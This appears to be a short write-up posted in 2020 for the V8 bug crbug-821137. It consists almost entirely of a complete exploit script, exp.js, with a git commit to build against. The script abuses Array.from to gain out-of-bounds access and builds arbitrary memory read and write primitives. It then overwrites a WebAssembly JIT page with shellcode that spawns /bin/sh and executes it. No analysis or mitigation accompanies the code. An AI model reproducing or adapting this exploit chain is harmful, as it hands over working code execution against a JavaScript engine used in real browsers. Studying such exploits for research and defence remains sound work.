crbug-821137

Posted on Aug 14, 2020

v8 build version

git reset --hard 1dab065bb4025bdd663ba12e2e976c34c3fa6599

exp.js

var f64 = new Float64Array(1);
var u32 = new Uint32Array(f64.buffer);
function d2u(v) { 
    f64[0] = v;
    return u32;
}
function u2d(lo, hi) {
    u32[0] = lo;
    u32[1] = hi;
    return f64[0];
}
function hex(lo, hi) {
    return ("0x" + hi.toString(16) + lo.toString(16));
}
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,
    1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,
    131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,
    109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var jit = wasm_instance.exports.main;
var oobArray = [1.1];
var bufArray = [];
var objArray = [];
Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ => (
    {
        counter : 0,
        max : 1024 * 8,
        next()
        {
            var result = this.counter++;
            if (this.counter > this.max)
            {
                oobArray.length = 1;
                bufArray.push(new ArrayBuffer(0x1337));
                objArray.push({'a': 0xdadb, 'b': jit});
                return {done: true};
            }
            else
            {
                return {value: result, done: false};
            }
        }
    }
) });
for(var i=0; i<0x10; i++)
{
    new Array(0x1000000);
}
var buf_off = 0;
var jit_off = 0;
for (var i=0; ; i++)
{
    var tmp = d2u(oobArray[i]);
    if (tmp[1]==0x1337)
    {
        buf_off = i-3;
        break;
    }
}
for (var i=0; ; i++)
{
    var tmp = d2u(oobArray[i]);
    if (tmp[1]==0xdadb)
    {
        jit_off = i+1;
        break;
    }
}
function aar(addr) {
    oobArray[buf_off+4] = addr;
    var arr = new Float64Array(bufArray[0], 0, 0x10);
    return arr[0]
}
function aaw(addr, data) {
    oobArray[buf_off+4] = addr;
    var arr = new Uint8Array(bufArray[0]);
    arr[0] = data;
}
var jsfunction = oobArray[jit_off];
var wasm1 = aar(u2d(d2u(jsfunction)[0]-1+0x18, d2u(jsfunction)[1]));
var wasm2 = aar(u2d(d2u(wasm1)[0]-1+0x8, d2u(wasm1)[1]));
var jitaddr = aar(u2d(d2u(wasm2)[0]-1+0x72, d2u(wasm2)[1]));
var sc = [0x31, 0xf6, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, 0x56, 0x53, 0x54, 0x5f, 0x6a, 0x3b, 0x58, 0x31, 0xd2, 0x0f, 0x05];
for (var i=0; i<sc.length; i++)
{
    var addr = u2d(d2u(jitaddr)[0]+i, d2u(jitaddr)[1]);
    aaw(addr, sc[i]);
}
jit();